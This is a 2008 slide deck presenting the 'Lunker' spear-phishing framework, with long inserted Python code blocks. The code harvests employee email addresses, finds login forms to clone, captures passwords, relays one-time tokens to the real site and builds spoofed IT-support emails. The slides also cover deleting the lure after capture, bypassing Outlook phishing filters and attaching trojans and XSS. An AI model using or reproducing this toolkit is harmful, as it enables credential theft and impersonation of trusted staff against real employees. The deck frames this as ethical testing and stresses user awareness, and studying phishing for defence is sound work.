Lunker: The Advanced Phishing Framework

Joshua Perrymon
CEO, PacketFocus
Agenda
• Intro
• What is Lunker?
• What can it do?
• Attack Theory
• Payloads
• The Old Way
• Demo
• Questions
Who am I?
• Joshua Perrymon, CEO, PacketFocus
• 12 years' experience in “ethical hacking”
• Over 200 spear-phishing attacks in 4-5 languages
• 85% success ratio using “blacklist” emails from the Internet
• MUCH higher using “whitelist” emails
What is Phishing?
• Phishing is a method of social engineering used to gain credentials or to have users perform a specific action.
• We have all received these types of emails.
• Sent out to millions of addresses.
• Usually triggers spam-filtering alerts.
• Uses a known phishing site that is usually taken down within a couple of days, if possible.
What is Spear Phishing?
• A directed phishing attack.
• Only targets a handful of users.
• Email addresses are harvested from the Internet or other public places.
• Very hard to stop, because the attack isn't sent out all over the Internet: the low volume means it rarely trips the spam filters that mass phishing does.
Attacking up the OSI
• Attacks have been moving up the OSI (Open Systems Interconnection) model.
Attacking up the OSI model cont.
How these attacks work
Doing this the “OLD” Way
• This takes time, but it doesn't require a lot of technical skill.
• Find emails
• Find the site to be phished
• Create the site
• Set up the PHP mail spoof
• Test
• Send
• Monitor
Using the Phishing Framework
• Easy and repeatable
Step 1.
PacketFocus.com 2008 Jperrymon
Step 2: Enter Client Info
Client Details
• This is entered into the local database, which gives an audit trail of each test's configuration and results. The idea is to document each step automatically, because no one else wants to do it.
• Enter URL and IP info if provided.
Step 3: Email Recon
But everyone uses their company email address, right?
• This is hard to protect against most of the time. Internal email addresses usually must be used in business communication, and they leak into Internet search engines.
• Search for “@acme.com” and look through the results.
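The recon step above, as an editor-added example (this is not Lunker's own recon module): it pulls the client-domain addresses out of whatever text the search results give back, undoes the common “[at]” / “(dot)” obfuscations, drops off-domain addresses and de-duplicates. The sample results text is constructed; including sub-domains of the client domain is an assumption that goes a little beyond the deck's plain “@acme.com” search.

```python
"""Harvest target-domain email addresses from search-result text.

Editor-added example, not Lunker's recon module. Assumptions: addresses may be
obfuscated with bracketed "at"/"dot"; sub-domains of the client domain are in
scope. The sample text below is constructed.
"""
import re
from typing import Set

# Addresses as they appear in prose; trailing punctuation is never part of the match.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}"
)

# De-obfuscation rules (assumption: bracketed forms only; a bare " at " is left
# alone because it would turn ordinary sentences into false hits).
DEOBFUSCATE = [
    (re.compile(r"\s*[\[\(\{]\s*at\s*[\]\)\}]\s*", re.I), "@"),
    (re.compile(r"\s*[\[\(\{]\s*dot\s*[\]\)\}]\s*", re.I), "."),
]


def harvest(text: str, domain: str, include_subdomains: bool = True) -> Set[str]:
    """Return the unique, lower-cased addresses in `text` that belong to `domain`."""
    for pattern, repl in DEOBFUSCATE:
        text = pattern.sub(repl, text)
    domain = domain.lower().lstrip("@")
    found: Set[str] = set()
    for match in EMAIL_RE.finditer(text):
        addr = match.group(0).lower()       # domains are case-insensitive; local parts rarely matter
        host = addr.rsplit("@", 1)[1]
        if host == domain or (include_subdomains and host.endswith("." + domain)):
            found.add(addr)
    return found


# Constructed sample: the kind of text a search for "@acme.com" returns.
SAMPLE_RESULTS = """
Contact John.Doe@Acme.com or sales [at] acme [dot] com for pricing.
Press: jane.smith@acme.com (mailto:jane.smith@acme.com?subject=Lunker)
Helpdesk: admin(at)acme(dot)com; partner contact bob@example.org
Legacy host: joe@mail.acme.com. Support forum post by Dave@ACME.COM.
"""

if __name__ == "__main__":
    for addr in sorted(harvest(SAMPLE_RESULTS, "acme.com")):
        print(addr)
```

Feed it the saved HTML or text of each results page; the set it returns is the “blacklist” address list the deck's success ratio refers to, and it is worth diffing against any “whitelist” the client supplies to see how much of the directory is already public.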
Step 4: Phishing Analysis
On the lookout
• This module actively searches the target URLs and IPs in scope to identify potential phishing targets.
• Any site that requires credentials remotely should be considered and identified.
• Top targets include webmail, VPN, and website logins.
• The tool identifies these portals and returns analysis based on the information gathered previously.
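What the analysis module has to find in each fetched page, as an editor-added example (not the framework's own code): every form that carries a password field, where it posts to, the field names a clone will need, and a guess at the portal type. The two pages are constructed stand-ins for what the scanner would fetch, and the keyword lists used to label a portal “webmail” or “vpn” are an assumption about typical naming, not something the deck defines.

```python
"""Find credential-bearing login forms in fetched pages and label the portal.

Editor-added example, not Lunker's analysis module. Works on HTML already
fetched (the two pages below are constructed); portal labels come from an
assumed keyword list.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urljoin

PORTAL_KEYWORDS = {   # assumption: words commonly seen in the URL or title of each portal type
    "webmail": ("owa", "webmail", "outlook", "exchange", "mail"),
    "vpn": ("vpn", "sslvpn", "remote", "citrix", "juniper"),
}


class LoginFormFinder(HTMLParser):
    """Collect every <form> that contains a password input, resolving its action URL."""

    def __init__(self, base_url: str) -> None:
        super().__init__()
        self.base_url = base_url
        self.title = ""
        self.forms: List[Dict] = []
        self._form: Optional[Dict] = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": urljoin(self.base_url, a.get("action", "")),
                          "method": a.get("method", "get").lower(),
                          "fields": [], "has_password": False}
        elif tag == "input" and self._form is not None:
            if a.get("name"):
                self._form["fields"].append(a["name"])     # names the clone must reproduce
            if a.get("type", "text").lower() == "password":
                self._form["has_password"] = True
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            if self._form["has_password"]:
                self.forms.append(self._form)
            self._form = None
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def classify_portal(url: str, title: str) -> str:
    """Label the portal from its URL and page title; 'website' when nothing matches."""
    haystack = (url + " " + title).lower()
    for label, words in PORTAL_KEYWORDS.items():
        if any(w in haystack for w in words):
            return label
    return "website"


def analyze(url: str, html: str) -> List[Dict]:
    """One record per login form: portal type, where it posts, method and field names."""
    parser = LoginFormFinder(url)
    parser.feed(html)
    parser.close()
    return [{"portal": classify_portal(url, parser.title), "action": f["action"],
             "method": f["method"], "fields": f["fields"]} for f in parser.forms]


# Constructed pages standing in for what the scanner fetches from the client's range.
OWA_PAGE = """<html><head><title>Outlook Web Access</title></head><body>
<form action="/owa/auth.aspx" method="post">
  <input type="text" name="username"> <input type="password" name="password">
  <input type="hidden" name="destination" value="https://mail.acme.com/owa/">
  <input type="submit" value="Log On"></form></body></html>"""

BROCHURE_PAGE = """<html><head><title>Acme Inc - Home</title></head><body>
<form action="/search" method="get"><input type="text" name="q"></form></body></html>"""

if __name__ == "__main__":
    print(analyze("https://mail.acme.com/owa/", OWA_PAGE))
    print(analyze("https://www.acme.com/", BROCHURE_PAGE))
```

The brochure page has a form but no password field, so it is correctly not a target; the hidden `destination` field on the OWA page is the kind of detail a cloned form has to carry or the real site rejects the replayed login.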
Step 5: Select the Bait
Email is easy
• Most often, a simple email from spoofed technical support is enough to have a user hand over login and password details.
• Analysis will identify token passwords: numeric entries should trigger the token MITM functions, because a one-time code has to be relayed to the real site while it is still valid.
• Start the analysis timers.
Verify it works
Now what?
• Log in to the phishing site locally to make sure it captures the password.
• It's easy to email the credentials. Be responsible and store them encrypted.
• Modules could auto-login based on the template used: Get email(), Get Attachment(), Get Keyword(), Get Subject().
Redirect Confusion
Where am I?
• Redirection must be used after the user logs in the first time: an error message, Google, etc.
• Redirect to the real site.
• Delete the email sent to the user after getting the credentials.
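The three slides above (token detection, capture, redirect) describe what the cloned login page does with a submission. The editor-added example below is not Lunker's capture module; it puts that logic in one place and also uses the three login options named later under “Start the Audit” (Capture, Capture/Login, Capture/Login/Scrape). It assumes form fields named `username` and `password`, that a 6-8 digit numeric value is a one-time token, and uses a constructed real-portal URL. Captures are kept in memory here; on an engagement they belong in an encrypted store, as the deck says.

```python
"""Classify a captured secret, pick the next action, answer with the redirect.

Editor-added example, not Lunker's code. Assumptions: fields `username` and
`password`; a 6-8 digit numeric secret is a one-time token; the login options
are the deck's Capture / Capture-Login / Capture-Login-Scrape; the real portal
URL is a constructed placeholder.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

REAL_PORTAL = "https://mail.acme.com/owa/"   # constructed stand-in for the real site
TOKEN_RE = re.compile(r"\d{6,8}")            # assumption: OTP / hardware-token codes

# Deck's login options -> what happens to a captured password.
LOGIN_OPTIONS = {
    "capture": "store",
    "capture_login": "auto_login",
    "capture_login_scrape": "auto_login_and_scrape",
}


@dataclass
class Capture:
    username: str
    secret: str
    kind: str           # "password" or "token"
    next_action: str    # store | auto_login | auto_login_and_scrape | token_mitm


@dataclass
class PhishPage:
    real_portal: str
    login_option: str = "capture"
    after_login: str = "real_site"     # deck's choices: real_site | google | error
    captures: List[Capture] = field(default_factory=list)   # in memory here; encrypt at rest on a job

    def handle_post(self, form: Dict[str, str]) -> Dict[str, object]:
        """Process one login POST; return the status, Location and body to send back."""
        user = form.get("username", "").strip().lower()
        secret = form.get("password", "").strip()
        if not user or not secret:
            # Nothing captured yet: show the form again rather than giving the game away.
            return {"status": 200, "location": None,
                    "body": "Please enter your user name and password."}

        if TOKEN_RE.fullmatch(secret):
            # A one-time code dies within a minute, so it must be relayed to the real
            # site at once: the deck's "token MITM" path, not store-for-later capture.
            kind, action = "token", "token_mitm"
        else:
            kind, action = "password", LOGIN_OPTIONS[self.login_option]
        self.captures.append(Capture(user, secret, kind, action))

        # Redirect confusion: the user must land somewhere plausible after the first login.
        if self.after_login == "error":
            return {"status": 200, "location": None,
                    "body": "The service is temporarily unavailable. Please try again later."}
        target = "https://www.google.com/" if self.after_login == "google" else self.real_portal
        return {"status": 302, "location": target, "body": ""}


if __name__ == "__main__":
    page = PhishPage(REAL_PORTAL, login_option="capture_login")
    print(page.handle_post({"username": "jdoe", "password": "Winter2008!"}))
    print(page.handle_post({"username": "jdoe", "password": "482913"}))
    print(page.captures)
```

Sending the user to the real portal after capture is the quietest option: they see the genuine login page, assume a typo, log in again and never see an error at all. The token path is why the deck starts timers at this step; a stored token is worthless by the time anyone reads the email.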
Spoof the email
Tony.. Tony Montana
• Set up a spoofed email.
• The goal is to have the user perform a pre-defined action.
• Authority, realism, and language play a vital role in a successful attack.
• The key is to gain trust as soon as possible.
• NLP (Neuro-Linguistic Programming)
• Milgram experiment (obedience to authority)
Select Footer
Footer
• If you want to write a custom body, select a
footer template to give the attack structure.
Scenario Options
Pick one.
• Pre-defined spoofed email scenarios are included with the framework. These are conversations that, based on actual field results, usually get the desired response.
• Scenarios:
  ▫ Tech Support
  ▫ Internal IT
  ▫ 3rd Party IT
  ▫ End-User
Stealthy
Email Headers
• Sometimes you need to modify the email headers.
• We will probably put something in here to identify the tool once it goes public.
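How the spoof, footer, scenario and header slides fit together, as an editor-added example (these are not Lunker's templates or its sender): one function assembles a message from a scenario, drops the phishing URL into the body, appends a footer template, and sets the tool-identifying header the deck says will be added. The four scenario texts, the footer, the sender display names and the header name `X-Phish-Assessment` are all assumptions; nothing is sent, the message is only built.

```python
"""Build one spoofed message from a scenario template, a footer and a tool header.

Editor-added example, not Lunker's templates or sender. The scenario texts,
footer, display names and the header name X-Phish-Assessment are assumptions.
"""
from email.message import EmailMessage
from email.utils import formataddr, formatdate, make_msgid
from typing import Optional

TOOL_HEADER = "X-Phish-Assessment"    # assumed name for the "identify the tool" header

# Deck's four scenarios: who the mail claims to be from and the pretext. Constructed text;
# {url} is replaced with the phishing link.
SCENARIOS = {
    "tech_support": {
        "from": ("Acme Technical Support", "support@acme.com"),
        "subject": "Action required: verify your webmail account",
        "body": ("Our records show your webmail account has not been verified since the "
                 "migration. Please sign in at {url} within 24 hours to avoid interruption."),
    },
    "internal_it": {
        "from": ("Acme IT Service Desk", "it-servicedesk@acme.com"),
        "subject": "Password expiry notice",
        "body": ("Your network password expires today. Sign in at {url} to confirm your "
                 "current password before the change is enforced."),
    },
    "third_party_it": {
        "from": ("ManagedIT Support Team", "support@managedit-partner.com"),
        "subject": "VPN client update for Acme staff",
        "body": "Acme has asked us to roll out the VPN update. Log in at {url} to start.",
    },
    "end_user": {
        "from": ("Pat Jones", "pat.jones@acme.com"),
        "subject": "Can you check this for me?",
        "body": "Hi, the link {url} keeps asking me to log in again - does it work for you?",
    },
}

# Footer template that gives a custom body the structure of real corporate mail.
FOOTER = ("\n\n--\nThis message is intended only for the named recipient. If you received it "
          "in error, please delete it and notify the sender.")


def build_email(scenario: str, target: str, phish_url: str, engagement_id: str,
                custom_body: Optional[str] = None, reply_to: Optional[str] = None) -> EmailMessage:
    """Return the complete spoofed message for one target (nothing is sent here)."""
    tpl = SCENARIOS[scenario]
    msg = EmailMessage()
    msg["From"] = formataddr(tpl["from"])        # the display name carries the authority
    msg["To"] = target
    msg["Subject"] = tpl["subject"]
    msg["Date"] = formatdate(localtime=True)
    msg["Message-ID"] = make_msgid(domain=tpl["from"][1].split("@")[1])  # matches the spoofed sender's domain
    if reply_to:
        msg["Reply-To"] = reply_to                # replies reach the tester, not the spoofed sender
    msg[TOOL_HEADER] = engagement_id              # lets the client attribute the mail to the assessment
    body = (custom_body or tpl["body"]).format(url=phish_url)   # custom bodies use the same {url} slot
    msg.set_content(body + FOOTER)
    return msg


if __name__ == "__main__":
    print(build_email("internal_it", "jdoe@acme.com", "https://mail-acme.com/owa/",
                      "ACME-2008-03", reply_to="tester@packetfocus.com").as_string())
```

`as_string()` gives the raw RFC 2822 message, which is also the form you want to paste into the local-mode test account: a mismatched `Message-ID` domain, a missing `Date`, or a `Reply-To` that points somewhere odd are exactly the small mistakes the test step is there to catch.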
Load the Ammo
Money Shot.
• This is what makes the framework stand out.
• The ability to add custom payloads to the phishing email.
• XSS, browser exploits, recon, trojans, exploits, backdoors, etc.
• Welcome to hack 2.0
Test Environment
Test 1.2.3.
• This module launches the local email client and the locally hosted phishing site at the same time.
• The tester sends the spoofed email to a locally configured account. This account is checked by the email client just as a normal user would.
• Look for mistakes. The smallest error can cause the attack not to work.
Local Mode
Start the Audit
Just a little patience…
• Monitor the web server, DB, MTA, and monitor.
• Set up MITM scripts to auto
• Configure alarms and real-time logic.
• Set up login options
  ▫ Capture
  ▫ Capture/Login
  ▫ Capture/Login/Scrape
DEMO
• Let's have a look at the current working version.
• How to bypass Outlook 2007 phishing filters.
What's Next
• MITM for 2nd-factor authentication
• Advanced payloads
  ▫ XSS
  ▫ CSRF
  ▫ Browser exploits
  ▫ Recon to determine the user's browser, OS, etc.
• Reporting
• Forum support
• Template sharing
• Training modules
• User reaction analysis module
• Ability to customize the templates
Thank You
• Thanks for sitting through this presentation. The main thing to take away is how attacks are moving up the OSI model and targeting the user (layer 8).
• It doesn't take a lot of technical skill to perform these types of attacks.
• User awareness is the only way to mitigate this risk. We can't rely on technology.